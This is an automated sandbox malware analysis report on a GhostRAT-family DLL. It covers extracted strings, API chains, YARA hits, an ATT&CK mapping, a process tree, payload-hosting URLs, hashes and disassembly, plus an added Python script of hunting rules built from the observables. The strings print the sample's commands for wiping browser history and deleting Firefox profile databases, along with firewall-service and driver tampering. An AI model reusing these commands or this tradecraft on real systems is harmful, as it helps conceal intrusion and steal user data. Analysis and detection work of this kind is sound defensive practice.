Source: ZfJheGhddq.dll | Binary or memory string: Shell_TrayWndProgmanDwmapi.dllDwmIsCompositionEnabledDwmEnableCompositiondwmapi.dllrunasexplorer.exeSeDebugPrivilegecmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255\AppData\Local\Google\Chrome\User Data\DefaultC:\Users\\AppData\Roaming\Microsoft\Skype for DesktopSkype.exedel /s /f %appdata%\Mozilla\Firefox\Profiles\*.dbfirefox.exe\AppData\Roaming\360se6\User Data\Default360se6.exe\AppData\Local\Tencent\QQBrowser\User Data\DefaultQQBrowser.exe\AppData\Roaming\SogouExplorerSogouExplorer.exeBITS -inst.sys\system32\drivers\\sysnative\drivers\SYSTEM\CurrentControlSet\Services\BITSSYSTEM\SetupSYSTEM\SelectMarkTimeSYSTEM\CurrentControlSet\Services\\Registry\Machine\System\CurrentControlSet\Services\%SZwUnloadDriverNTDLL.DLLRtlInitUnicodeStringSeLoadDriverPrivilege
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: Progman
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_100A8230 | cpuid
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10002340 | GetWindowLongA,PostQuitMessage,SetWindowLongA,GetModuleHandleA,LoadIconA,SetClassLongA,DestroyWindow,GetDlgItemTextA,GetDlgItem,SetFocus,GetLocalTime,sprintf,GetDlgItem,GetDlgItem,GetWindowTextLengthA,GetWindowTextLengthA,SetWindowTextA,GetWindowTextLengthA,SendMessageA,SendMessageA,SendMessageA,SetDlgItemTextA,GetDlgItem,SetFocus
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1002A260 | RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,wsprintfA,RegCloseKey,wsprintfA,GetComputerNameA,GetTickCount,wsprintfA,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,wsprintfA,ReleaseDC,wsprintfA,wsprintfA,wsprintfA,GetCommandLineA,wsprintfA,GetUserNameA,wsprintfA,wsprintfA,FindWindowA,GetWindow,GetWindowTextA,GetWindow,GetClassNameA,GlobalMemoryStatusEx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_1001E020 | GetVersionExA,GetModuleFileNameA,sprintf,WaitForSingleObject,CloseHandle,FindWindowA,FindWindowA,Sleep,FindWindowA,Sleep,FindWindowA,CloseHandle,ExitProcess

                  Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10026980 | OpenServiceA 00000000,sharedaccess,000F01FF

                  Stealing of Sensitive Information

Source: Yara match | File source: ZfJheGhddq.dll, type: SAMPLE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: ZfJheGhddq.dll, type: SAMPLE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 1568, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4268, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6908, type: MEMORYSTR
Source: Yara match | File source: ZfJheGhddq.dll, type: SAMPLE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE

                  Remote Access Functionality

Source: Yara match | File source: ZfJheGhddq.dll, type: SAMPLE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: ZfJheGhddq.dll, type: SAMPLE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10023650 | socket,bind,getsockname,inet_addr
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_10023A10 | WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10023650 | socket,bind,getsockname,inet_addr
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_10023A10 | WSAStartup,socket,htons,bind,listen,accept,malloc,accept,malloc,CreateThread,Sleep,CloseHandle
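Several of the behaviours listed in this report translate directly into host-level hunting rules: the OpenEventLogA/ClearEventLogA chain at 0_2_1000E540, cmd.exe launching rundll32.exe against a DLL in the user's profile by ordinal (#1), the "RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255" command in the strings blob, the "sharedaccess" service opened with access mask 000F01FF (SERVICE_ALL_ACCESS), and the PE32 dropped as C:\Users\Public\Documents\MM\svchos1.exe in the behavior graph. The script below is an added example and is not part of the Joe Sandbox report or of the sample; the Event record, its field names and the sample records are constructed for illustration and only loosely imitate Sysmon and Windows event fields, and the assumption that the sharedaccess open is followed by a service stop (System event 7036) is the example's own, not something the report shows.

```python
"""Hunting rules built from the behaviours listed in this report.

Added example, not part of the Joe Sandbox output.  The event records are
constructed for the example and only loosely imitate Sysmon / Windows
event fields; adapt the field names to your own telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process", "file", "eventlog" or "service"
    image: str = ""      # executing process image (process/file events)
    cmdline: str = ""    # process command line
    target: str = ""     # created file path, cleared log name, or service name
    event_id: int = 0    # Windows event ID for eventlog/service events


# Report: strings blob contains "cmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255"
def browser_history_wipe(e):
    return e.kind == "process" and bool(
        re.search(r"inetcpl\.cpl\s*,\s*clearmytracksbyprocess", e.cmdline, re.I))


# Report: cmd.exe spawned rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1
# (a DLL under a user profile, invoked through an ordinal export)
def rundll32_user_dll_ordinal(e):
    return (e.kind == "process"
            and e.image.lower().endswith("rundll32.exe")
            and bool(re.search(r'\\users\\[^"]+\.dll"?\s*,\s*#\d+', e.cmdline, re.I)))


# Report: rundll32.exe dropped C:\Users\Public\Documents\MM\svchos1.exe (PE32)
def public_documents_exe_drop(e):
    return (e.kind == "file"
            and bool(re.match(r"c:\\users\\public\\", e.target, re.I))
            and e.target.lower().endswith(".exe"))


# Report: OpenEventLogA/ClearEventLogA chain.  A cleared Security log raises
# event 1102; a cleared System/Application log raises event 104.
def eventlog_cleared(e):
    return e.kind == "eventlog" and e.event_id in (1102, 104)


# Report: OpenServiceA(..., "sharedaccess", 0x000F01FF), i.e. SERVICE_ALL_ACCESS.
# Assumption for this example only: the follow-on is a stop of that service,
# which the Service Control Manager logs as System event 7036.
def firewall_service_stopped(e):
    return (e.kind == "service" and e.event_id == 7036
            and e.target.lower() == "sharedaccess")


RULES = [browser_history_wipe, rundll32_user_dll_ordinal,
         public_documents_exe_drop, eventlog_cleared, firewall_service_stopped]


def detect(events):
    """Return (rule name, event index) pairs for every rule that fires."""
    return [(rule.__name__, i)
            for i, ev in enumerate(events) for rule in RULES if rule(ev)]


def fired_rules(events):
    """Sorted, de-duplicated names of the rules that fired over the event list."""
    return sorted({name for name, _ in detect(events)})


# Constructed events mirroring the report's observables, plus one benign rundll32 launch.
SAMPLE_EVENTS = [
    Event("process", image=r"C:\Windows\SysWOW64\rundll32.exe",
          cmdline=r'rundll32.exe "C:\Users\user\Desktop\ZfJheGhddq.dll",#1'),
    Event("process", image=r"C:\Windows\SysWOW64\cmd.exe",
          cmdline=r"cmd.exe /c RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255"),
    Event("file", image=r"C:\Windows\SysWOW64\rundll32.exe",
          target=r"C:\Users\Public\Documents\MM\svchos1.exe"),
    Event("eventlog", target="Security", event_id=1102),
    Event("service", target="SharedAccess", event_id=7036),
    Event("process", image=r"C:\Windows\System32\rundll32.exe",
          cmdline=r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name:28s} <- event {idx}: {SAMPLE_EVENTS[idx]}")
```

The rules are deliberately narrow: each one encodes a single observable from this report rather than a generic heuristic, so a hit points back to a specific line above. The last sample event is a legitimate rundll32 invocation of a System32 DLL by export name and fires nothing, which is the false-positive case the rundll32 rule is shaped around.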
MITRE ATT&CK matrix, listed by tactic. A number in brackets is the badge shown next to that technique on the original page; entries without one are the matrix's unpopulated grid cells.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools
Execution: Native API [11], Service Execution [12], At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript
Persistence: DLL Side-Loading [1], Create Account [1], Windows Service [111], Bootkit [1], Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd
Privilege Escalation: Exploitation for Privilege Escalation [1], DLL Side-Loading [1], Access Token Manipulation [1], Windows Service [111], Process Injection [23], RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd
Defense Evasion: Disable or Modify Tools [11], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [3], Timestomp [1], DLL Side-Loading [1], Masquerading [1], Access Token Manipulation [1], Process Injection [23], Bootkit [1], Rundll32 [1], Indicator Removal [1]
Credential Access: Input Capture [111], LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture
Discovery: System Time Discovery [1], Account Discovery [1], System Service Discovery [1], File and Directory Discovery [2], System Information Discovery [15], Network Share Discovery [1], Security Software Discovery [12], Process Discovery [12], Application Window Discovery [1], System Owner/User Discovery [1], System Network Connections Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools
Collection: Archive Collected Data [1], Input Capture [111], Clipboard Data [3], Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging
Command and Control: Ingress Tool Transfer [1], Encrypted Channel [1], Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1], Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption
Behavior Graph ID: 1557655 | Sample: ZfJheGhddq.dll | Start date: 18/11/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 6 other signatures

Process tree:
loaddll32.exe
  signatures: Found evasive API chain (may stop execution after checking mutex); Contains functionality to automate explorer (e.g. start an application); Contains functionality to infect the boot sector; 4 other signatures
  +- rundll32.exe
  |    dropped: C:\Users\Public\Documents\MM\svchos1.exe (PE32)
  |    signatures: Found evasive API chain (may stop execution after checking mutex); Contains functionality to automate explorer (e.g. start an application); Contains functionality to infect the boot sector; 3 other signatures
  |    +- cmd.exe
  |    |    +- conhost.exe
  |    +- cmd.exe
  |         +- conhost.exe
  +- cmd.exe
  |    +- rundll32.exe
  |         +- cmd.exe
  |         |    +- conhost.exe
  |         +- cmd.exe
  |              +- conhost.exe
  +- conhost.exe

Source | Detection | Scanner | Label | Link
ZfJheGhddq.dll | 66% | ReversingLabs | Win32.Downloader.GhostRAT |
ZfJheGhddq.dll | 100% | Avira | BDS/Zegost.lloamn |
ZfJheGhddq.dll | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Documents\MM\svchos1.exe | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://localhost.ptlogin2.qq.com:4301%sAccept-Language: | 0% | Avira URL Cloud | safe |
https://ssl.ptlogin2.qq.com%sAccept-Language: | 0% | Avira URL Cloud | safe |
http://ptlogin2.qun.qq.com%sAccept-Language: | 0% | Avira URL Cloud | safe |
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt | 0% | Avira URL Cloud | safe |
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps:// | 0% | Avira URL Cloud | safe |
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt | 0% | Avira URL Cloud | safe |
http://qun.qq.com%sAccept-Language: | 0% | Avira URL Cloud | safe |
                  No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://ssl.ptlogin2.qq.com%s | loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | - | high
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt | loaddll32.exe, loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | Avira URL Cloud: safe | unknown
https://localhost.ptlogin2.qq.com:4301%sAccept-Language: | loaddll32.exe, rundll32.exe | false | Avira URL Cloud: safe | unknown
https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_ | rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | - | high
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt | loaddll32.exe, loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | Avira URL Cloud: safe | unknown
https://ssl.ptlogin2.qq.com%sAccept-Language: | loaddll32.exe, rundll32.exe | false | Avira URL Cloud: safe | unknown
http://ptlogin2.qun.qq.com%s | loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | - | high
http://ptlogin2.qun.qq.com%sAccept-Language: | loaddll32.exe, rundll32.exe | false | Avira URL Cloud: safe | unknown
http://qun.qq.com%s | loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | - | high
https://localhost.ptlogin2.qq.com:4301%s | loaddll32.exe, loaddll32.exe, 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, rundll32.exe, 00000003.00000002.4028225256.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028177063.00000000100FA000.00000008.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | - | high
http://qun.qq.com%sAccept-Language: | loaddll32.exe, rundll32.exe | false | Avira URL Cloud: safe | unknown
https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txthttps:// | loaddll32.exe, 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4028259362.000000001011E000.00000004.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4028211008.000000001011E000.00000004.00000001.01000000.00000003.sdmp, ZfJheGhddq.dll | false | Avira URL Cloud: safe | unknown
                            No contacted IP infos
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1557655
                            Start date and time:2024-11-18 14:10:54 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 38s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:18
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:ZfJheGhddq.dll
                            renamed because original name is a hash value
                            Original Sample Name:57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc.dll
                            Detection:MAL
                            Classification:mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 9
                            • Number of non-executed functions: 279
                            Cookbook Comments:
                            • Found application associated with file extension: .dll
                            • Override analysis time to 240s for rundll32
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • VT rate limit hit for: ZfJheGhddq.dll
                            No simulations
                            No context
                            No context
                            No context
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\Documents\MM\svchos1.exe | PD5dVJNpz7.dll | malicious | GhostRat, Mimikatz, Nitol
- | 7YtmCkMUx3.dll | malicious | GhostRat, Mimikatz, Nitol
- | tROeAyXq2X.exe | malicious | Mimikatz, RunningRAT
- | me.exe | malicious | RunningRAT
- | gE4NVCZDRk.exe | malicious | Bdaejec, RunningRAT
- | uHmFQqHIIA.exe | malicious | RunningRAT
- | ofR1Hd4NPM.exe | malicious | RunningRAT
- | 9JQ3JboYdz.exe | malicious | RunningRAT
- | 3B1TaPwSlt.exe | malicious | RunningRAT
- | 2Syx0ZLsgo.exe | malicious | RunningRAT
                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):61440
                                                Entropy (8bit):6.199746098562656
                                                Encrypted:false
                                                SSDEEP:1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
                                                MD5:889B99C52A60DD49227C5E485A016679
                                                SHA1:8FA889E456AA646A4D0A4349977430CE5FA5E2D7
                                                SHA-256:6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
                                                SHA-512:08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: PD5dVJNpz7.dll, Detection: malicious
• Filename: 7YtmCkMUx3.dll, Detection: malicious
• Filename: tROeAyXq2X.exe, Detection: malicious
• Filename: me.exe, Detection: malicious
• Filename: gE4NVCZDRk.exe, Detection: malicious
• Filename: uHmFQqHIIA.exe, Detection: malicious
• Filename: ofR1Hd4NPM.exe, Detection: malicious
• Filename: 9JQ3JboYdz.exe, Detection: malicious
• Filename: 3B1TaPwSlt.exe, Detection: malicious
• Filename: 2Syx0ZLsgo.exe, Detection: malicious
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.....^...^...^.pb^...^.c._...^.c._...^...^c..^.c._...^.c._...^.c._...^.c.^...^.c._...^Rich...^........PE..L...9..j.................b...........a............@..........................@............@.............................................hg...................0..........T........................... ........................m..`....................text...La.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat...............~..............@....rsrc...hg.......h..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.330682053193624
                                                TrID:
                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                • DOS Executable Generic (2002/1) 0.20%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:ZfJheGhddq.dll
                                                File size:1'269'760 bytes
                                                MD5:18ea526e9d1f36692776b2004cecd595
                                                SHA1:7d37805f3d1ffe9f43c599ae50dce96abf0a63c5
                                                SHA256:57eff460128e65204d46aa5a0012f8ba4758fa76a74d9dabe5d4b4b0bd1b11cc
                                                SHA512:b72bc75542d6847d154092d8b67947dd3d33dddd8237f5fed6faf47776f98eba726f0e9f3f02bdd8543ea366b7bb2d143f7647cde0f83a24a5489163d96d5474
                                                SSDEEP:24576:Goh41ZHE+JGXGM92i6p5a9S7N/iBtKB32Sttm7izM5GrkQPXHMtR1tD1b/tTkR7X:Akr7VTkp
                                                TLSH:A8455B43E2B64CA3D7D80034DC6AE7B677347A1C97F786737240EDDAB5A22907D2421A
                                                File Content Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........q!_..r_..r_..r...r^..ri..rY..rx.dr]..r../re..r_..r...r0..r^..r0..r[..r0..r[..r$..rX..r...rX..ri..r]..ri..r]..r..@r[..r..Br@..
                                                Icon Hash:7ae282899bbab082
                                                Entrypoint:0x1002d2eb
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x10000000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                DLL Characteristics:
                                                Time Stamp:0x6710B511 [Thu Oct 17 06:56:17 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:6718574bfa82ab04bcaf82fa9136fc6c
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                push ebx
                                                mov ebx, dword ptr [ebp+08h]
                                                push esi
                                                mov esi, dword ptr [ebp+0Ch]
                                                push edi
                                                mov edi, dword ptr [ebp+10h]
                                                test esi, esi
                                                jne 00007FCBF4E766CBh
                                                cmp dword ptr [1012F1D4h], 00000000h
                                                jmp 00007FCBF4E766E8h
                                                cmp esi, 01h
                                                je 00007FCBF4E766C7h
                                                cmp esi, 02h
                                                jne 00007FCBF4E766E4h
                                                mov eax, dword ptr [10158600h]
                                                test eax, eax
                                                je 00007FCBF4E766CBh
                                                push edi
                                                push esi
                                                push ebx
                                                call eax
                                                test eax, eax
                                                je 00007FCBF4E766CEh
                                                push edi
                                                push esi
                                                push ebx
                                                call 00007FCBF4E765DAh
                                                test eax, eax
                                                jne 00007FCBF4E766C6h
                                                xor eax, eax
                                                jmp 00007FCBF4E76710h
                                                push edi
                                                push esi
                                                push ebx
                                                call 00007FCBF4E6A83Ah
                                                cmp esi, 01h
                                                mov dword ptr [ebp+0Ch], eax
                                                jne 00007FCBF4E766CEh
                                                test eax, eax
                                                jne 00007FCBF4E766F9h
                                                push edi
                                                push eax
                                                push ebx
                                                call 00007FCBF4E765B6h
                                                test esi, esi
                                                je 00007FCBF4E766C7h
                                                cmp esi, 03h
                                                jne 00007FCBF4E766E8h
                                                push edi
                                                push esi
                                                push ebx
                                                call 00007FCBF4E765A5h
                                                test eax, eax
                                                jne 00007FCBF4E766C5h
                                                and dword ptr [ebp+0Ch], eax
                                                cmp dword ptr [ebp+0Ch], 00000000h
                                                je 00007FCBF4E766D3h
                                                mov eax, dword ptr [10158600h]
                                                test eax, eax
                                                je 00007FCBF4E766CAh
                                                push edi
                                                push esi
                                                push ebx
                                                call eax
                                                mov dword ptr [ebp+0Ch], eax
                                                mov eax, dword ptr [ebp+0Ch]
                                                pop edi
                                                pop esi
                                                pop ebx
                                                pop ebp
                                                retn 000Ch
                                                jmp dword ptr [100B7424h]
                                                jmp dword ptr [100B7420h]
                                                jmp dword ptr [100B7418h]
                                                jmp dword ptr [100B73F4h]
                                                jmp dword ptr [100B73BCh]
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                jmp dword ptr [00000000h]
                                                Programming Language:
                                                • [ C ] VS98 (6.0) SP6 build 8804
                                                • [IMP] VS2005 build 50727
                                                • [C++] VS98 (6.0) SP6 build 8804
                                                • [ C ] VS98 (6.0) build 8168
                                                • [C++] VS98 (6.0) build 8168
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                • [LNK] VS98 (6.0) imp/exp build 8168
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xf9740 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf7088 | 0x190 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x199000 | 0x10 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x19a000 | 0x66a8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0xb7000 | 0x754 | .rdata
